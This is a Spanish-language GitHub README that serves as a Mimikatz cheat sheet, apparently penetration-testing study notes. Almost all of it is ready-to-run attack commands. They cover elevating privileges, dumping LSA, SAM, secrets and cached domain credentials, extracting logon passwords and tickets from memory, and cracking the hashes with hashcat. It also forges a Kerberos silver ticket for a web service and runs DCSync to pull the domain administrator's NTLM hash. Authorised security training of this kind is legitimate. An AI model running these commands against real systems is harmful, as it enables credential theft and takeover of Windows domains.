Skip to content

Latest commit

 

History

History
71 lines (52 loc) · 1.48 KB

README.md

File metadata and controls

71 lines (52 loc) · 1.48 KB

Mimikatz Cheat Sheet

Correr como Administrador

mimikatz# token::elevate
mimikatz# privilege::debug

Dumpear Hashes

mimikatz# lsadump::lsa /patch

hashcat -m 1000 <hash> rockyou.txt

Password dumping (Para todos los usuarios que iniciaron sesión en el equipo local) - Extraer contraseñas del sistema

mimikatz# sekurlsa::logonPasswords /full

Nota: Tener habilitado solamente el privilege::debug

Password en memoria

mimikatz# sekurlsa::tickets

sam dumping

mimikatz# lsadump::sam

Nota: Tener habilitado solamente el privilege::debug y token::elevate

secrets dumping

mimikatz# lsadump::secrets

Nota: Tener habilitado solamente el privilege::debug

cache dumping

mimikatz# lsadump::cache

El valor lo metemos en un archivo con el formato:
$DCC2$10240#USER#VALOR-MsCacheV2

Crackeamos:
hashcat -m 2100 hash-web_svc /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Crear Silver Ticket (SPN)

kerberos::golden /sid:S-1-5-21-1987370270-658905905-1781884369 /domain:corp.com /ptt /target:web04.corp.com /service:http /rc4:<HASH-NTM> /user:<ALGUN-USER-DEL-DOMAIN>

Luego validamos en Windows si esta el Silver ticket:
PS> klist
PS> iwr -UseDefaultCredentials http://web04

Extraer hashes NTLM cuando el usuario tiene DCSync

privilege::debug

lsadump::dcsync /domain:<DOMAIN> /user:<DOMAIN>\administrator

⬅️ Regresar